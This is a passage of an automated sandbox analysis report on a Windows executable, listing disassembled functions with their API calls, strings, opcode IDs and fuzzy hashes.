                                                                                                  • Opcode Fuzzy Hash: 40db2ce9338316655fd4a01c2a901321e3742d94181496e29f02c686e6d7bf58
                                                                                                  • Instruction Fuzzy Hash: BB91A7B229C348BFD221DBA0DD49FFB77ACEB8A704F044819F645D2081D775EA449B62
                                                                                                  Function 00906FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00906FAA
                                                                                                  • _wcslen.LIBCMT ref: 00907013
                                                                                                  • _wcslen.LIBCMT ref: 00907084
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                    • Part of subcall function 0090A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641,000000FF), ref: 0090A1F1
                                                                                                    • Part of subcall function 0090A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641), ref: 0090A21F
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00907139
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00907155
                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00907298
                                                                                                    • Part of subcall function 00909DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009073BC,?,?,?,00000000), ref: 00909DBC
                                                                                                    • Part of subcall function 00909DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00909E70
                                                                                                    • Part of subcall function 00909620: CloseHandle.KERNELBASE(000000FF,?,?,009095D6,?,?,?,?,?,00932641,000000FF), ref: 0090963B
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 3983180755-3508440684
                                                                                                  • Opcode ID: 821f0ae85ee6a1ed13461a5406ddecfc7d82ac7e814fd00841f00a64cbe0a043
                                                                                                  • Instruction ID: b61a9844d940a997a093324225469ea987bad56454e44f153ebffe75f3c5cafe
                                                                                                  • Opcode Fuzzy Hash: 821f0ae85ee6a1ed13461a5406ddecfc7d82ac7e814fd00841f00a64cbe0a043
                                                                                                  • Instruction Fuzzy Hash: 23C1C071D08604AEEB25DBB4DC81BEEF3ACAF44310F00455AF956E71C2D774BA848B61
                                                                                                  Function 0092D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 50af2d1170729a94c0ce4ff15d7712eca5576375799d86625fa10133c7aca8d7
                                                                                                  • Instruction ID: 6fbcd172af84cd41fcddc18ce9a950e8953b55cfd5a0aa4e9bdf07509acd5ff8
                                                                                                  • Opcode Fuzzy Hash: 50af2d1170729a94c0ce4ff15d7712eca5576375799d86625fa10133c7aca8d7
                                                                                                  • Instruction Fuzzy Hash: 1EC24E71E096388FDB25CE28ED807EAB7B9EB44305F1545EAD44DE7244E778AE818F40
                                                                                                  Function 009032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog_swprintf
                                                                                                  • String ID: CMT$h%u$hc%u
                                                                                                  • API String ID: 146138363-3282847064
                                                                                                  • Opcode ID: f20c956416452a83f9fe6afd7883d967582a27f00775529d3de7f48ff43c598f
                                                                                                  • Instruction ID: 82a3aeaceb1ec6c3f063e10cad37a2f7ca27d188042031d51e9bce9ba5b56fd1
                                                                                                  • Opcode Fuzzy Hash: f20c956416452a83f9fe6afd7883d967582a27f00775529d3de7f48ff43c598f
                                                                                                  • Instruction Fuzzy Hash: 7332B471614384AFDB14DF74C896BE93BA9AF55300F04857DFD8A8B2C2DB749A49CB20
                                                                                                  Function 0090286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00902874
                                                                                                  • _strlen.LIBCMT ref: 00902E3F
                                                                                                    • Part of subcall function 009102BA: __EH_prolog.LIBCMT ref: 009102BF
                                                                                                    • Part of subcall function 00911B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0090BAE9,00000000,?,?,?,00010464), ref: 00911BA0
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00902F91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 1206968400-2756464174
                                                                                                  • Opcode ID: a6e4c6680f2d38d1ae473c7eeac921ac764759365bbb2a089bcfd2222f8e76b2
                                                                                                  • Instruction ID: e312cbe3e87fad463b449a1c716c0f188f8c91410c05221299345e3fbf6ee7b2
                                                                                                  • Opcode Fuzzy Hash: a6e4c6680f2d38d1ae473c7eeac921ac764759365bbb2a089bcfd2222f8e76b2
                                                                                                  • Instruction Fuzzy Hash: 9462F6716003458FDF19DF38C88A7EA3BA5AF55300F08857EED9A8B2C2DB759945CB60
                                                                                                  Function 0091F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0091F844
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0091F910
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0091F930
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0091F93A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: ec3852d879d2b79690527b777d6f4a3a015b79052c8d7497377670ba1ff36508
                                                                                                  • Instruction ID: 91776bb4d66a3711cfd015ad1cc588b4ec8bd0659ec8327417f1a33adcabbf1b
                                                                                                  • Opcode Fuzzy Hash: ec3852d879d2b79690527b777d6f4a3a015b79052c8d7497377670ba1ff36508
                                                                                                  • Instruction Fuzzy Hash: 27312975D4521DDBDB21DFA4D9897CCBBB8AF08304F1040EAE40DAB250EB759B859F44
                                                                                                  Function 0091E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(80000000,0091E5E8,0000001C,0091E7DD,00000000,?,?,?,?,?,?,?,0091E5E8,00000004,00961CEC,0091E86D), ref: 0091E6B4
                                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0091E5E8,00000004,00961CEC,0091E86D), ref: 0091E6CF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                  • String ID: D
                                                                                                  • API String ID: 401686933-2746444292
                                                                                                  • Opcode ID: ca670b23b9add8be6cc32bf8ade21eb3f468b796f9f2f6cda475e3a6952e6c30
                                                                                                  • Instruction ID: 08faa665430d767dae411648b012171240a796713ed56b1c1f722e84bb492726
                                                                                                  • Opcode Fuzzy Hash: ca670b23b9add8be6cc32bf8ade21eb3f468b796f9f2f6cda475e3a6952e6c30
                                                                                                  • Instruction Fuzzy Hash: B601D4327401096BDF14DE69DC09ADD7BAAAFC4324F0CC120ED19D7150D638DD458680
                                                                                                  Function 00928EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00928FB5
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00928FBF
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00928FCC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: da323b6dee3ab665010d69b4cf6882faabcf53a54f70b908ca8e28bb6d87ff52
                                                                                                  • Instruction ID: 5d415eb7faf34c32900efda0b06af7bf493f56ea3bb8e759875884ce6082115f
                                                                                                  • Opcode Fuzzy Hash: da323b6dee3ab665010d69b4cf6882faabcf53a54f70b908ca8e28bb6d87ff52
                                                                                                  • Instruction Fuzzy Hash: 2E31C47595122CABCB21DF64DD89BDDBBB8AF48310F5041EAE81CA7250EB709F858F44
                                                                                                  Function 0092D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                  • Instruction ID: 830dc2a01800682e74e55095e18d0b5790b66b845c47d9d851b8edca70006973
                                                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                  • Instruction Fuzzy Hash: F1023C71E012299FDF14CFA9D9806ADB7F5EF88314F258269E919E7384D730AE41CB80
                                                                                                  Function 0091AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0091AF35
                                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0093E72C,?,?), ref: 0091AF84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                  • String ID:
                                                                                                  • API String ID: 2169056816-0
                                                                                                  • Opcode ID: 34ea1acd7567289bbb1eee0d38c9950b05eac7cb6167bbd4fe23d69980d5eddb
                                                                                                  • Instruction ID: d9e5f3479947d062e0712049e5887fa3499159ad95437b1efb878af0887f1d30
                                                                                                  • Opcode Fuzzy Hash: 34ea1acd7567289bbb1eee0d38c9950b05eac7cb6167bbd4fe23d69980d5eddb
                                                                                                  • Instruction Fuzzy Hash: B4017C3A254308AAD7109FA5EC45F9A77BCEF48710F408022FA05A71A0E370AA59DFA5
                                                                                                  Function 00906C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00906DDF,00000000,00000400), ref: 00906C74
                                                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00906C95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 3479602957-0
                                                                                                  • Opcode ID: 585024bb61c21e1a69e2981810bcca4d27124f3e5fa9830b489f01ef6bada597
                                                                                                  • Instruction ID: 2354b2a5b15a9b59db575c610cf35f556289bfd8f2cc162af39a9a57e7c8fd83
                                                                                                  • Opcode Fuzzy Hash: 585024bb61c21e1a69e2981810bcca4d27124f3e5fa9830b489f01ef6bada597
                                                                                                  • Instruction Fuzzy Hash: 8BD0C931388310BFFA150B618D46F2A7B99BF45B56F18C404B795E80E0CBB89524BA29
                                                                                                  Function 009319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009319EF,?,?,00000008,?,?,0093168F,00000000), ref: 00931C21
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: bff4de81ff23eaaeb16a7a8127d28a182c1432e9d430cc6dc99dfb139dfa1f72
                                                                                                  • Instruction ID: 852bac09f92f5092f2958a91167e68d12a802dd9ed60c138ff40d7c78090e2d3
                                                                                                  • Opcode Fuzzy Hash: bff4de81ff23eaaeb16a7a8127d28a182c1432e9d430cc6dc99dfb139dfa1f72
                                                                                                  • Instruction Fuzzy Hash: B1B12A356106089FD719CF28C48AB65BBE0FF45365F258659E8D9CF2A1C335E992CF40
                                                                                                  Function 0091F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0091F66A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 417961e9115b8fb92a037fe7d1ff04a0b75da41837ebcc35ba90d0706d9f20b8
                                                                                                  • Instruction ID: 81ddca1ce56bda3c17268a78c0d538d01ab4687c89f0dedcde17f49c079e4869
                                                                                                  • Opcode Fuzzy Hash: 417961e9115b8fb92a037fe7d1ff04a0b75da41837ebcc35ba90d0706d9f20b8
                                                                                                  • Instruction Fuzzy Hash: D5518EB1A1460D8FEB24CF58E8A17AABBF4FB48354F24857AD402EB390D3749940DF50
                                                                                                  Function 0090B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0090B16B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: 5fb5544cd589474048c606eb199b687c86ae8eff286f12579bd04e9848bdd593
                                                                                                  • Instruction ID: c175d6b8ce1f2ec1265e66928dd8b01b7d579f519b3631d5834496c807e73e09
                                                                                                  • Opcode Fuzzy Hash: 5fb5544cd589474048c606eb199b687c86ae8eff286f12579bd04e9848bdd593
                                                                                                  • Instruction Fuzzy Hash: 25F03AB8E182088FDB28CB18ED92AE973F5FB99355F104395D51993390C3B4A9C09E60
                                                                                                  Function 009040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gj
                                                                                                  • API String ID: 0-4203073231
                                                                                                  • Opcode ID: ec65054c6222cb8f4f7e94c738f6246f39115b0b540affddb66b29e0ff1285e1
                                                                                                  • Instruction ID: a63a07099ae9cf54c7c5211b56680594886d1652c9ea43e956b14306bda6c080
                                                                                                  • Opcode Fuzzy Hash: ec65054c6222cb8f4f7e94c738f6246f39115b0b540affddb66b29e0ff1285e1
